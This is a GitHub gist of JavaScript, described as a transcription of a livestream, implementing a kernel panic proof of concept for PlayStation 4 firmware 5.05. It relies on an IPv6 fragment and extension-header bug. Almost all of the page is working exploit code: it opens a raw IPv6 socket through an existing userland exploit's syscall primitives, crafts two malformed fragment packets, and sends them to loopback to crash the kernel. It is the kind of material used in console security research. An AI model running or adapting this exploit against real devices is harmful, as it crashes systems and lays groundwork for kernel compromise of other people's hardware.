Skip to content

Instantly share code, notes, and snippets.

@CelesteBlue-dev

CelesteBlue-dev/kpanic_505.js Secret

Created Jan 30, 2021
Embed
What would you like to do?
Transcription of Specter's video stream of him coding PS4 FW 5.05 kernel panic PoC using TheFloW's IP6_EXTHDR_CHECK XNU PoC
window.try_df_crash = function() {
//alert("Your PS4 will have a kernel panic soon...");
var AF_INET6 = 28;
var SOCK_RAW = 3;
var IPPROTO_HOPOPTS = 0;
var IPPROTO_IPV6 = 41;
var IPPROTO_FRAGMENT = 44;
var IPPROTO_ICMPV6 = 58;
var IPPROTO_DSTOPTS = 60;
var IPPROTO_RAW = 255;
var IP6OPT_PADN = 1;
var IP6F_MORE_FRAG = 0x100;
dumpBytes = function dumpBytes(addr, len) {
var dumpStr = "Dump: ";
for (var i = 0; i < len; i++)
dumpStr += "0x" + read1(addr.add32(i)).toString(16) + " ";
print(dumpStr);
}
var sock = p.syscall("sys_socket", AF_INET6,
SOCK_RAW, IPPROTO_HOPOPTS);
print("sock = " + sock. toString(16));
var addr = malloc(0x1C);
p.write1(addr.add32(0x01), AF_INET6); // sockaddr_in6->sin6_family
p.write2(addr.add32(0x02), 0); // sockaddr_in6->sin6_port
// 0x1B510 = inet_pton
p.fcall(window.libKernelBase.add32(0x1B510), AF_INET6, stringify("::1"), addr.add32(0x08));
var packet1 = malloc(0x18);
for (var i = 0; i < 0x18; i += 4)
p.write4(packet1.add32(i), 0x41414141);
p.write1(packet1.add32(0x00 + 0x00), IPPROTO_FRAGMENT);
p.write1(packet1.add32(0x00 + 0x01), 0);
p.write1(packet1.add32(0x02 + 0x00), IP6OPT_PADN);
p.write1(packet1.add32(0x02 + 0x01), 4);
p.write1(packet1.add32(0x08 + 0x00), IPPROTO_DSTOPTS);
p.write1(packet1.add32(0x08 + 0x01), 0);
p.write2(packet1.add32(0x08 + 0x02), IP6F_MORE_FRAG);
p.write4(packet1.add32(0x08 + 0x04), 0x1337);
p.write1(packet1.add32(0x10 + 0x00), IPPROTO_ICMPV6);
p.write1(packet1.add32(0x10 + 0x01), 1);
p.write1(packet1.add32(0x12 + 0x00), IP6OPT_PADN);
p.write1(packet1.add32(0x12 + 0x01), 4);
var packet2 = malloc(0x28);
for (var i = 0; i < 0x28; i += 4)
p.write4(packet2.add32(i), 0x42424242);
p.write1(packet2.add32(0x00 + 0x00), IPPROTO_FRAGMENT);
p.write1(packet2.add32(0x00 + 0x01), 0);
p.write1(packet2.add32(0x02 + 0x00), IP6OPT_PADN);
p.write1(packet2.add32(0x02 + 0x01), 4);
p.write1(packet2.add32(0x08 + 0x00), IPPROTO_DSTOPTS);
p.write1(packet2.add32(0x08 + 0x01), 0);
p.write2(packet2.add32(0x08 + 0x02), 0x800);
p.write4(packet2.add32(0x08 + 0x04), 0x1337);
p.write1(packet2.add32(0x10 + 0x00), IP6OPT_PADN);
p.write1(packet2.add32(0x10 + 0x01), 6);
var rv1 = p.syscall("sys_sendto", sock, packet1, 0x18, 0, addr, 0x1C);
window.testFunc = function() {
var rv2 = p.syscall("sys_sendto", sock, packet2, 0x28, 0, addr, 0x1C);
print("rv2 = " + rv2.toString(16));
}
print("rv1 = " + rv1.toString(16));
setTimeout(window.testFunc, 3000);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment